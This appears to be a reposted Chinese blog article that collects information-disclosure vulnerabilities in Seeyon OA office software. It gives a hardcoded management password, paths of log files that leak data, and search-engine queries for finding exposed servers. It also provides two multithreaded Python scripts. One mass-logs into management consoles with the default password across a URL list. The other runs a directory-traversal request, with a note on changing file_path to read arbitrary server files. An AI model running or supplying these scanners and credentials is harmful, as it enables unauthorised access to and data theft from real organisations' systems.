致远OA敏感信息泄露漏洞合集(含批量检测POC)

这篇具有很好参考价值的文章主要介绍了致远OA敏感信息泄露漏洞合集(含批量检测POC)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。

产品系列: A3、A6、A8
品牌: 用友
对象: 微型、小型企业、企业部门级

敏感信息泄露

A6 status.jsp 信息泄露漏洞

漏洞描述

致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

漏洞影响

致远OA A8-m

网络测绘

title=“A8-m”

漏洞复现

访问监控页面

/seeyon/management/status.jsp
后台密码为 WLCCYBD@SEEYON
登录后通过如下url获得一些敏感信息

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

致远OA敏感信息泄露漏洞合集(含批量检测POC)

POC 批量检测

思路:python post发包登陆,头部location:会进行跳转以及状态码一般为302

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-18 11:14
@Author  : whgojp
@File    : POC.py

'''
import requests
from threading import Thread

THREAD_NUM = 10

password = 'WLCCYBD@SEEYON'

with open('urls.txt', 'r') as f:
    urls = [url.strip() for url in f.readlines()]


def check_url(url):
    if 'https' not in url:
        url = 'http://' + url
    try:
        # 发送POST请求
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': url + '/seeyon/management/index.jsp',
        }
        response = requests.post(url + '/seeyon/management/index.jsp', data={'password': password}, headers=headers,
                                 allow_redirects=False)
        # 判断是否登录成功
        if response.status_code == 302 and 'Location' in response.headers and response.headers['Location'].endswith(
                '/seeyon/management/status.jsp'):
            # 登录成功,输出URL
            print(url + ' is vulnerable')
            with open("result.txt", "a") as f:
                f.write(f"{url} is vulnerable.\n")
        else:
            # 登录失败
            pass
    except:
        # 出现异常
        pass

threads = []
for i in range(THREAD_NUM):
    thread_urls = urls[i::THREAD_NUM]
    thread = Thread(target=lambda urls: [check_url(url) for url in urls], args=(thread_urls,))
    threads.append(thread)

for thread in threads:
    thread.start()

for thread in threads:
    thread.join()

致远OA敏感信息泄露漏洞合集(含批量检测POC)

getSessionList.jsp Session泄漏漏洞

漏洞描述

通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况

网络测绘

app=“致远互联-OA”

批量检测POC

致远OA 帆软组件 ReportServer 目录遍历漏洞

漏洞描述

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息

漏洞影响

致远OA 帆软组件

网络测绘

title=“致远A8-V5协同管理软件 V6.1sp1”

POC(批量检测)

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-20 16:53
@Author  : whgojp
@File    : POC.py
'''
import requests
import threading
def check_url(url, counter):
    if 'https' not in url:
        url = 'http://'+url
    try:
        url = url + '/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true '
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"{url} is accessible.")
            with open("result.txt", "a") as f:
                f.write(f"{url} is accessible.\n")
        else:
            pass
    except requests.exceptions.RequestException as e:
        pass
    counter[0] += 1
    print(f"Scanning progress: {counter[0]}/{counter[1]}")
    
urls = []
with open("urls.txt", "r") as f:
    for line in f:
        urls.append(line.strip())
threads = []
counter = [0, len(urls)]
for url in urls:
    thread = threading.Thread(target=check_url, args=(url, counter))
    thread.start()
    threads.append(thread)
for thread in threads:
    thread.join()

致远OA敏感信息泄露漏洞合集(含批量检测POC)
致远OA敏感信息泄露漏洞合集(含批量检测POC)
如果要读取文件进行目录遍历,只需要更改file_path就行了

A6 createMysql.jsp 数据库敏感信息泄露漏洞

待续文章来源地址https://www.toymoban.com/news/detail-432973.html

A6 DownExcelBeanServlet 用户敏感信息漏洞

A6 initDataAssess.jsp 用户敏感信息漏洞

A6 config.jsp 敏感信息泄漏漏洞

到了这里,关于致远OA敏感信息泄露漏洞合集(含批量检测POC)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【漏洞复现-通达OA】通达OA get_contactlist.php 敏感信息泄漏漏洞

    通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。 ● 通达OA2013 ● hunter app.name=\\\"通达 OA\\\" ● 特征 四、漏洞复现

    2024年02月20日
    浏览(39)
  • 实战敏感信息泄露高危漏洞挖掘利用

    信息泄露就是某网站某公司对敏感数据没有安全的保护,导致泄露敏感被攻击者利用,例如泄露:账号,密码,管理员,身份证,数据库,服务器,敏感路径等等 如果进了业务系统可以SQL注入,文件上传,getshell获取服务器权限高危操作 例如: 可以根据账号,猜测默认密码

    2023年04月08日
    浏览(46)
  • Web漏洞-敏感信息泄露-后台地址爆破

    通过爬虫去爬取网站目录,然后将爬取到目录进行展现,同时也可以匹配关键目录,如:admin,manger等。 实验环境:kali 实验工具:Dirb 默认情况下后台地址是不应被搜索引擎爬取到,因为后台涉及到关键信息的展示和配置,如果后台地址简单或者后台存在未授权问题,则会给

    2024年02月12日
    浏览(50)
  • Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby预置了最具攻击效果的漏洞引擎,覆盖Weblogic,Tomcat等最严重漏洞。每天从互联网(如CVE)会产生大量的漏洞信息,我们筛选了会被用于真实攻击的漏洞进行每日更新。Goby也提供了可以自定义的漏洞检查框架,发动了互联网的大量安全从业者贡献POC,保证持续的应急响应能

    2024年02月15日
    浏览(57)
  • MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)

    漏洞描述: MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存

    2023年04月08日
    浏览(77)
  • 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) 1、调用文件上传接口上传测试文件,请求包如下: 2、

    2024年02月11日
    浏览(63)
  • pikachu靶场-敏感信息泄露

    敏感信息泄漏简述 攻击方式 常见的攻击方式主要是扫描应用程序获取到敏感数据 漏洞原因 应用维护或者开发人员无意间上传敏感数据,如 github 文件泄露 敏感数据文件的权限设置错误,如网站目录下的数据库备份文件泄露 网络协议、算法本身的弱点,如 telent、ftp、md5 等

    2024年02月09日
    浏览(44)
  • 【Android】logcat日志敏感信息泄露

    之前会遇到一些应用logcat打印敏感信息,包括但不限于账号密码,cookie凭证,或一些敏感的secretkey之类的,下面客观的记录下起危害性。  1. logcat logcat是Android系统提供的一种记录日志的工具。它可以帮助开发人员诊断应用程序中的问题,例如崩溃、内存泄漏和性能问题。l

    2024年02月07日
    浏览(45)
  • Web安全系列——敏感信息泄露与加密机制

    数字化时代,越来越多的数据正在被传输到Web应用程序中,这其中不乏个人或机构的敏感信息。 如果Web应用程序未采取正确的加密机制,这些信息可能会遭到窃取或篡改,从而使用户数据或机构的财产受到威胁。 窃取用户利益 :攻击者将有可能窃取个人信息(信用卡号、密

    2024年02月06日
    浏览(45)
  • 【web渗透思路】框架敏感信息泄露(特点、目录、配置)

      博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。 擅长:对

    2023年04月19日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包